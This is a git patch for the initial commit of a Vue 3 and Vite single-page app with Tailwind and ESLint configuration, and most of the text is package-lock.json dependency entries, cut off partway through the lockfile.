From 6bec512b2d9a8d9eed7e82569f57b82bdbcaa02b Mon Sep 17 00:00:00 2001 From: Allison Robbins Date: Wed, 27 Mar 2024 17:32:38 -0400 Subject: [PATCH 01/21] TAT-127 create shell for spa (#7) * clone base vue template * add all pages and navbar * style navbar * add package-lock * remove md files from template * make fixes to remove prettier --------- Co-authored-by: arobbins --- .eslintrc.cjs | 16 + .gitignore | 30 + .vscode/extensions.json | 3 + .vscode/settings.json | 6 + .vscode/vue.code-snippets | 17 + index.html | 20 + package-lock.json | 3089 ++++++++++++++++++++++++++++++++ package.json | 29 + postcss.config.js | 7 + public/favicon.ico | Bin 0 -> 4286 bytes src/App.vue | 17 + src/assets/logo.svg | 1 + src/components/Calculator.vue | 21 + src/components/Help.vue | 17 + src/components/Home.vue | 22 + src/components/Methodology.vue | 17 + src/components/Navigation.vue | 46 + src/index.css | 23 + src/main.ts | 10 + src/router/index.ts | 35 + src/shims-vue.d.ts | 6 + src/stores/example.store.ts | 6 + tailwind.config.js | 24 + tsconfig.json | 10 + vite.config.js | 14 + 25 files changed, 3486 insertions(+) create mode 100644 .eslintrc.cjs create mode 100644 .gitignore create mode 100644 .vscode/extensions.json create mode 100644 .vscode/settings.json create mode 100644 .vscode/vue.code-snippets create mode 100644 index.html create mode 100644 package-lock.json create mode 100644 package.json create mode 100644 postcss.config.js create mode 100644 public/favicon.ico create mode 100644 src/App.vue create mode 100644 src/assets/logo.svg create mode 100644 src/components/Calculator.vue create mode 100644 src/components/Help.vue create mode 100644 src/components/Home.vue create mode 100644 src/components/Methodology.vue create mode 100644 src/components/Navigation.vue create mode 100644 src/index.css create mode 100644 src/main.ts create mode 100644 src/router/index.ts create mode 100644 src/shims-vue.d.ts create mode 100644 src/stores/example.store.ts create mode 100644 tailwind.config.js create mode 100644 tsconfig.json create mode 100644 vite.config.js diff --git a/.eslintrc.cjs b/.eslintrc.cjs new file mode 100644 index 0000000..c8d332c --- /dev/null +++ b/.eslintrc.cjs @@ -0,0 +1,16 @@ +/* eslint-env node */ +require("@rushstack/eslint-patch/modern-module-resolution"); + +module.exports = { + root: true, + parserOptions: { + parser: "@typescript-eslint/parser", + ecmaVersion: 2020, + }, + extends: [ + "plugin:vue/vue3-essential", + "eslint:recommended", + "@vue/typescript", + "@vue/typescript/recommended", + ], +}; diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..915bf77 --- /dev/null +++ b/.gitignore @@ -0,0 +1,30 @@ +# Logs +logs +*.log +npm-debug.log* +yarn-debug.log* +yarn-error.log* +pnpm-debug.log* +lerna-debug.log* + +node_modules +.DS_Store +dist +dist-ssr +coverage +*.local + +/cypress/videos/ +/cypress/screenshots/ + +# Editor directories and files +.vscode/* +!.vscode/extensions.json +!.vscode/settings.json +!.vscode/vue.code-snippets +.idea +*.suo +*.ntvs* +*.njsproj +*.sln +*.sw? diff --git a/.vscode/extensions.json b/.vscode/extensions.json new file mode 100644 index 0000000..c0a6e5a --- /dev/null +++ b/.vscode/extensions.json @@ -0,0 +1,3 @@ +{ + "recommendations": ["Vue.volar", "Vue.vscode-typescript-vue-plugin"] +} diff --git a/.vscode/settings.json b/.vscode/settings.json new file mode 100644 index 0000000..5ea2b92 --- /dev/null +++ b/.vscode/settings.json @@ -0,0 +1,6 @@ +{ + "editor.formatOnSave": true, + "editor.codeActionsOnSave": { + "source.fixAll.eslint": "explicit" + }, +} \ No newline at end of file diff --git a/.vscode/vue.code-snippets b/.vscode/vue.code-snippets new file mode 100644 index 0000000..2d0c62a --- /dev/null +++ b/.vscode/vue.code-snippets @@ -0,0 +1,17 @@ +{ + "Vue 3 SFC with Scoped CSS": { + "prefix": "sfc", + "body": [ + "", + "", + "", + "", + "", + "" + ], + "description": "Base for a Vue 3 SFC with scoped css style block", + "scope": "vue" + }, +} \ No newline at end of file diff --git a/index.html b/index.html new file mode 100644 index 0000000..f42c25e --- /dev/null +++ b/index.html @@ -0,0 +1,20 @@ + + + + + + + + + + Vite App + + + +
+ + + diff --git a/package-lock.json b/package-lock.json new file mode 100644 index 0000000..ded1530 --- /dev/null +++ b/package-lock.json @@ -0,0 +1,3089 @@ +{ + "name": "simple-project", + "version": "0.0.0", + "lockfileVersion": 3, + "requires": true, + "packages": { + "": { + "name": "simple-project", + "version": "0.0.0", + "dependencies": { + "pinia": "^2.0.29", + "primevue": "^3.49.1", + "vue": "^3.2.37", + "vue-router": "^4.1.6" + }, + "devDependencies": { + "@rushstack/eslint-patch": "^1.1.0", + "@typescript-eslint/eslint-plugin": "^5.4.0", + "@typescript-eslint/parser": "^5.4.0", + "@vitejs/plugin-vue": "^4.0.0", + "autoprefixer": "^10.4.7", + "eslint": "^8.5.0", + "eslint-plugin-vue": "^9.0.0", + "postcss": "^8.4.14", + "tailwindcss": "^3.1.4", + "typescript": "4.7", + "vite": "^4.0.4" + } + }, + "node_modules/@babel/parser": { + "version": "7.20.13", + "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.20.13.tgz", + "integrity": "sha512-gFDLKMfpiXCsjt4za2JA9oTMn70CeseCehb11kRZgvd7+F67Hih3OHOK24cRrWECJ/ljfPGac6ygXAs/C8kIvw==", + "bin": { + "parser": "bin/babel-parser.js" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@esbuild/android-arm": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.18.20.tgz", + "integrity": "sha512-fyi7TDI/ijKKNZTUJAQqiG5T7YjJXgnzkURqmGj13C6dCqckZBLdl4h7bkhHt/t0WP+zO9/zwroDvANaOqO5Sw==", + "cpu": [ + "arm" + ], + "dev": true, + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/android-arm64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.18.20.tgz", + "integrity": "sha512-Nz4rJcchGDtENV0eMKUNa6L12zz2zBDXuhj/Vjh18zGqB44Bi7MBMSXjgunJgjRhCmKOjnPuZp4Mb6OKqtMHLQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/android-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.18.20.tgz", + "integrity": "sha512-8GDdlePJA8D6zlZYJV/jnrRAi6rOiNaCC/JclcXpB+KIuvfBN4owLtgzY2bsxnx666XjJx2kDPUmnTtR8qKQUg==", + "cpu": [ + "x64" + ], + "dev": true, + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/darwin-arm64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.18.20.tgz", + "integrity": "sha512-bxRHW5kHU38zS2lPTPOyuyTm+S+eobPUnTNkdJEfAddYgEcll4xkT8DB9d2008DtTbl7uJag2HuE5NZAZgnNEA==", + "cpu": [ + "arm64" + ], + "dev": true, + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/darwin-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.18.20.tgz", + "integrity": "sha512-pc5gxlMDxzm513qPGbCbDukOdsGtKhfxD1zJKXjCCcU7ju50O7MeAZ8c4krSJcOIJGFR+qx21yMMVYwiQvyTyQ==", + "cpu": [ + "x64" + ], + "dev": true, + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/freebsd-arm64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.18.20.tgz", + "integrity": "sha512-yqDQHy4QHevpMAaxhhIwYPMv1NECwOvIpGCZkECn8w2WFHXjEwrBn3CeNIYsibZ/iZEUemj++M26W3cNR5h+Tw==", + "cpu": [ + "arm64" + ], + "dev": true, + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/freebsd-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.18.20.tgz", + "integrity": "sha512-tgWRPPuQsd3RmBZwarGVHZQvtzfEBOreNuxEMKFcd5DaDn2PbBxfwLcj4+aenoh7ctXcbXmOQIn8HI6mCSw5MQ==", + "cpu": [ + "x64" + ], + "dev": true, + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-arm": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.18.20.tgz", + "integrity": "sha512-/5bHkMWnq1EgKr1V+Ybz3s1hWXok7mDFUMQ4cG10AfW3wL02PSZi5kFpYKrptDsgb2WAJIvRcDm+qIvXf/apvg==", + "cpu": [ + "arm" + ], + "dev": true, + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-arm64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.18.20.tgz", + "integrity": "sha512-2YbscF+UL7SQAVIpnWvYwM+3LskyDmPhe31pE7/aoTMFKKzIc9lLbyGUpmmb8a8AixOL61sQ/mFh3jEjHYFvdA==", + "cpu": [ + "arm64" + ], + "dev": true, + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-ia32": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.18.20.tgz", + "integrity": "sha512-P4etWwq6IsReT0E1KHU40bOnzMHoH73aXp96Fs8TIT6z9Hu8G6+0SHSw9i2isWrD2nbx2qo5yUqACgdfVGx7TA==", + "cpu": [ + "ia32" + ], + "dev": true, + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-loong64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.18.20.tgz", + "integrity": "sha512-nXW8nqBTrOpDLPgPY9uV+/1DjxoQ7DoB2N8eocyq8I9XuqJ7BiAMDMf9n1xZM9TgW0J8zrquIb/A7s3BJv7rjg==", + "cpu": [ + "loong64" + ], + "dev": true, + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-mips64el": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.18.20.tgz", + "integrity": "sha512-d5NeaXZcHp8PzYy5VnXV3VSd2D328Zb+9dEq5HE6bw6+N86JVPExrA6O68OPwobntbNJ0pzCpUFZTo3w0GyetQ==", + "cpu": [ + "mips64el" + ], + "dev": true, + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-ppc64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.18.20.tgz", + "integrity": "sha512-WHPyeScRNcmANnLQkq6AfyXRFr5D6N2sKgkFo2FqguP44Nw2eyDlbTdZwd9GYk98DZG9QItIiTlFLHJHjxP3FA==", + "cpu": [ + "ppc64" + ], + "dev": true, + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-riscv64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.18.20.tgz", + "integrity": "sha512-WSxo6h5ecI5XH34KC7w5veNnKkju3zBRLEQNY7mv5mtBmrP/MjNBCAlsM2u5hDBlS3NGcTQpoBvRzqBcRtpq1A==", + "cpu": [ + "riscv64" + ], + "dev": true, + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-s390x": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.18.20.tgz", + "integrity": "sha512-+8231GMs3mAEth6Ja1iK0a1sQ3ohfcpzpRLH8uuc5/KVDFneH6jtAJLFGafpzpMRO6DzJ6AvXKze9LfFMrIHVQ==", + "cpu": [ + "s390x" + ], + "dev": true, + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.18.20.tgz", + "integrity": "sha512-UYqiqemphJcNsFEskc73jQ7B9jgwjWrSayxawS6UVFZGWrAAtkzjxSqnoclCXxWtfwLdzU+vTpcNYhpn43uP1w==", + "cpu": [ + "x64" + ], + "dev": true, + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/netbsd-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.18.20.tgz", + "integrity": "sha512-iO1c++VP6xUBUmltHZoMtCUdPlnPGdBom6IrO4gyKPFFVBKioIImVooR5I83nTew5UOYrk3gIJhbZh8X44y06A==", + "cpu": [ + "x64" + ], + "dev": true, + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/openbsd-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.18.20.tgz", + "integrity": "sha512-e5e4YSsuQfX4cxcygw/UCPIEP6wbIL+se3sxPdCiMbFLBWu0eiZOJ7WoD+ptCLrmjZBK1Wk7I6D/I3NglUGOxg==", + "cpu": [ + "x64" + ], + "dev": true, + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/sunos-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.18.20.tgz", + "integrity": "sha512-kDbFRFp0YpTQVVrqUd5FTYmWo45zGaXe0X8E1G/LKFC0v8x0vWrhOWSLITcCn63lmZIxfOMXtCfti/RxN/0wnQ==", + "cpu": [ + "x64" + ], + "dev": true, + "optional": true, + "os": [ + "sunos" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/win32-arm64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.18.20.tgz", + "integrity": "sha512-ddYFR6ItYgoaq4v4JmQQaAI5s7npztfV4Ag6NrhiaW0RrnOXqBkgwZLofVTlq1daVTQNhtI5oieTvkRPfZrePg==", + "cpu": [ + "arm64" + ], + "dev": true, + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/win32-ia32": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.18.20.tgz", + "integrity": "sha512-Wv7QBi3ID/rROT08SABTS7eV4hX26sVduqDOTe1MvGMjNd3EjOz4b7zeexIR62GTIEKrfJXKL9LFxTYgkyeu7g==", + "cpu": [ + "ia32" + ], + "dev": true, + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/win32-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.18.20.tgz", + "integrity": "sha512-kTdfRcSiDfQca/y9QIkng02avJ+NCaQvrMejlsB3RRv5sE9rRoeBPISaZpKxHELzRxZyLvNts1P27W3wV+8geQ==", + "cpu": [ + "x64" + ], + "dev": true, + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@eslint/eslintrc": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-1.4.1.tgz", + "integrity": "sha512-XXrH9Uarn0stsyldqDYq8r++mROmWRI1xKMXa640Bb//SY1+ECYX6VzT6Lcx5frD0V30XieqJ0oX9I2Xj5aoMA==", + "dev": true, + "dependencies": { + "ajv": "^6.12.4", + "debug": "^4.3.2", + "espree": "^9.4.0", + "globals": "^13.19.0", + "ignore": "^5.2.0", + "import-fresh": "^3.2.1", + "js-yaml": "^4.1.0", + "minimatch": "^3.1.2", + "strip-json-comments": "^3.1.1" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@humanwhocodes/config-array": { + "version": "0.11.8", + "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.11.8.tgz", + "integrity": "sha512-UybHIJzJnR5Qc/MsD9Kr+RpO2h+/P1GhOwdiLPXK5TWk5sgTdu88bTD9UP+CKbPPh5Rni1u0GjAdYQLemG8g+g==", + "dev": true, + "dependencies": { + "@humanwhocodes/object-schema": "^1.2.1", + "debug": "^4.1.1", + "minimatch": "^3.0.5" + }, + "engines": { + "node": ">=10.10.0" + } + }, + "node_modules/@humanwhocodes/module-importer": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@humanwhocodes/module-importer/-/module-importer-1.0.1.tgz", + "integrity": "sha512-bxveV4V8v5Yb4ncFTT3rPSgZBOpCkjfK0y4oVVVJwIuDVBRMDXrPyXRL988i5ap9m9bnyEEjWfm5WkBmtffLfA==", + "dev": true, + "engines": { + "node": ">=12.22" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/nzakas" + } + }, + "node_modules/@humanwhocodes/object-schema": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-1.2.1.tgz", + "integrity": "sha512-ZnQMnLV4e7hDlUvw8H+U8ASL02SS2Gn6+9Ac3wGGLIe7+je2AeAOxPY+izIPJDfFDb7eDjev0Us8MO1iFRN8hA==", + "dev": true + }, + "node_modules/@nodelib/fs.scandir": { + "version": "2.1.5", + "resolved": "https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz", + "integrity": "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==", + "dev": true, + "dependencies": { + "@nodelib/fs.stat": "2.0.5", + "run-parallel": "^1.1.9" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/@nodelib/fs.stat": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz", + "integrity": "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==", + "dev": true, + "engines": { + "node": ">= 8" + } + }, + "node_modules/@nodelib/fs.walk": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz", + "integrity": "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==", + "dev": true, + "dependencies": { + "@nodelib/fs.scandir": "2.1.5", + "fastq": "^1.6.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/@rushstack/eslint-patch": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/@rushstack/eslint-patch/-/eslint-patch-1.2.0.tgz", + "integrity": "sha512-sXo/qW2/pAcmT43VoRKOJbDOfV3cYpq3szSVfIThQXNt+E4DfKj361vaAt3c88U5tPUxzEswam7GW48PJqtKAg==", + "dev": true + }, + "node_modules/@types/json-schema": { + "version": "7.0.11", + "resolved": "https://registry.npmjs.org/@types/json-schema/-/json-schema-7.0.11.tgz", + "integrity": "sha512-wOuvG1SN4Us4rez+tylwwwCV1psiNVOkJeM3AUWUNWg/jDQY2+HE/444y5gc+jBmRqASOm2Oeh5c1axHobwRKQ==", + "dev": true + }, + "node_modules/@types/semver": { + "version": "7.3.13", + "resolved": "https://registry.npmjs.org/@types/semver/-/semver-7.3.13.tgz", + "integrity": "sha512-21cFJr9z3g5dW8B0CVI9g2O9beqaThGQ6ZFBqHfwhzLDKUxaqTIy3vnfah/UPkfOiF2pLq+tGz+W8RyCskuslw==", + "dev": true + }, + "node_modules/@typescript-eslint/eslint-plugin": { + "version": "5.50.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/eslint-plugin/-/eslint-plugin-5.50.0.tgz", + "integrity": "sha512-vwksQWSFZiUhgq3Kv7o1Jcj0DUNylwnIlGvKvLLYsq8pAWha6/WCnXUeaSoNNha/K7QSf2+jvmkxggC1u3pIwQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/scope-manager": "5.50.0", + "@typescript-eslint/type-utils": "5.50.0", + "@typescript-eslint/utils": "5.50.0", + "debug": "^4.3.4", + "grapheme-splitter": "^1.0.4", + "ignore": "^5.2.0", + "natural-compare-lite": "^1.4.0", + "regexpp": "^3.2.0", + "semver": "^7.3.7", + "tsutils": "^3.21.0" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "@typescript-eslint/parser": "^5.0.0", + "eslint": "^6.0.0 || ^7.0.0 || ^8.0.0" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/parser": { + "version": "5.50.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/parser/-/parser-5.50.0.tgz", + "integrity": "sha512-KCcSyNaogUDftK2G9RXfQyOCt51uB5yqC6pkUYqhYh8Kgt+DwR5M0EwEAxGPy/+DH6hnmKeGsNhiZRQxjH71uQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/scope-manager": "5.50.0", + "@typescript-eslint/types": "5.50.0", + "@typescript-eslint/typescript-estree": "5.50.0", + "debug": "^4.3.4" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^6.0.0 || ^7.0.0 || ^8.0.0" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/scope-manager": { + "version": "5.50.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-5.50.0.tgz", + "integrity": "sha512-rt03kaX+iZrhssaT974BCmoUikYtZI24Vp/kwTSy841XhiYShlqoshRFDvN1FKKvU2S3gK+kcBW1EA7kNUrogg==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "5.50.0", + "@typescript-eslint/visitor-keys": "5.50.0" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/type-utils": { + "version": "5.50.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/type-utils/-/type-utils-5.50.0.tgz", + "integrity": "sha512-dcnXfZ6OGrNCO7E5UY/i0ktHb7Yx1fV6fnQGGrlnfDhilcs6n19eIRcvLBqx6OQkrPaFlDPk3OJ0WlzQfrV0bQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/typescript-estree": "5.50.0", + "@typescript-eslint/utils": "5.50.0", + "debug": "^4.3.4", + "tsutils": "^3.21.0" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "*" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/types": { + "version": "5.50.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-5.50.0.tgz", + "integrity": "sha512-atruOuJpir4OtyNdKahiHZobPKFvZnBnfDiyEaBf6d9vy9visE7gDjlmhl+y29uxZ2ZDgvXijcungGFjGGex7w==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/typescript-estree": { + "version": "5.50.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-5.50.0.tgz", + "integrity": "sha512-Gq4zapso+OtIZlv8YNAStFtT6d05zyVCK7Fx3h5inlLBx2hWuc/0465C2mg/EQDDU2LKe52+/jN4f0g9bd+kow==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "5.50.0", + "@typescript-eslint/visitor-keys": "5.50.0", + "debug": "^4.3.4", + "globby": "^11.1.0", + "is-glob": "^4.0.3", + "semver": "^7.3.7", + "tsutils": "^3.21.0" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/utils": { + "version": "5.50.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/utils/-/utils-5.50.0.tgz", + "integrity": "sha512-v/AnUFImmh8G4PH0NDkf6wA8hujNNcrwtecqW4vtQ1UOSNBaZl49zP1SHoZ/06e+UiwzHpgb5zP5+hwlYYWYAw==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.9", + "@types/semver": "^7.3.12", + "@typescript-eslint/scope-manager": "5.50.0", + "@typescript-eslint/types": "5.50.0", + "@typescript-eslint/typescript-estree": "5.50.0", + "eslint-scope": "^5.1.1", + "eslint-utils": "^3.0.0", + "semver": "^7.3.7" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^6.0.0 || ^7.0.0 || ^8.0.0" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/eslint-scope": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-5.1.1.tgz", + "integrity": "sha512-2NxwbF/hZ0KpepYN0cNbo+FN6XoK7GaHlQhgx/hIZl6Va0bF45RQOOwhLIy8lQDbuCiadSLCBnH2CFYquit5bw==", + "dev": true, + "dependencies": { + "esrecurse": "^4.3.0", + "estraverse": "^4.1.1" + }, + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/estraverse": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-4.3.0.tgz", + "integrity": "sha512-39nnKffWz8xN1BU/2c79n9nB9HDzo0niYUqx6xyqUnyoAnQyyWpOTdZEeiCch8BBu515t4wp9ZmgVfVhn9EBpw==", + "dev": true, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/@typescript-eslint/visitor-keys": { + "version": "5.50.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-5.50.0.tgz", + "integrity": "sha512-cdMeD9HGu6EXIeGOh2yVW6oGf9wq8asBgZx7nsR/D36gTfQ0odE5kcRYe5M81vjEFAcPeugXrHg78Imu55F6gg==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "5.50.0", + "eslint-visitor-keys": "^3.3.0" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@vitejs/plugin-vue": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@vitejs/plugin-vue/-/plugin-vue-4.0.0.tgz", + "integrity": "sha512-e0X4jErIxAB5oLtDqbHvHpJe/uWNkdpYV83AOG2xo2tEVSzCzewgJMtREZM30wXnM5ls90hxiOtAuVU6H5JgbA==", + "dev": true, + "engines": { + "node": "^14.18.0 || >=16.0.0" + }, + "peerDependencies": { + "vite": "^4.0.0", + "vue": "^3.2.25" + } + }, + "node_modules/@vue/compiler-core": { + "version": "3.2.45", + "resolved": "https://registry.npmjs.org/@vue/compiler-core/-/compiler-core-3.2.45.tgz", + "integrity": "sha512-rcMj7H+PYe5wBV3iYeUgbCglC+pbpN8hBLTJvRiK2eKQiWqu+fG9F+8sW99JdL4LQi7Re178UOxn09puSXvn4A==", + "dependencies": { + "@babel/parser": "^7.16.4", + "@vue/shared": "3.2.45", + "estree-walker": "^2.0.2", + "source-map": "^0.6.1" + } + }, + "node_modules/@vue/compiler-dom": { + "version": "3.2.45", + "resolved": "https://registry.npmjs.org/@vue/compiler-dom/-/compiler-dom-3.2.45.tgz", + "integrity": "sha512-tyYeUEuKqqZO137WrZkpwfPCdiiIeXYCcJ8L4gWz9vqaxzIQRccTSwSWZ/Axx5YR2z+LvpUbmPNXxuBU45lyRw==", + "dependencies": { + "@vue/compiler-core": "3.2.45", + "@vue/shared": "3.2.45" + } + }, + "node_modules/@vue/compiler-sfc": { + "version": "3.2.45", + "resolved": "https://registry.npmjs.org/@vue/compiler-sfc/-/compiler-sfc-3.2.45.tgz", + "integrity": "sha512-1jXDuWah1ggsnSAOGsec8cFjT/K6TMZ0sPL3o3d84Ft2AYZi2jWJgRMjw4iaK0rBfA89L5gw427H4n1RZQBu6Q==", + "dependencies": { + "@babel/parser": "^7.16.4", + "@vue/compiler-core": "3.2.45", + "@vue/compiler-dom": "3.2.45", + "@vue/compiler-ssr": "3.2.45", + "@vue/reactivity-transform": "3.2.45", + "@vue/shared": 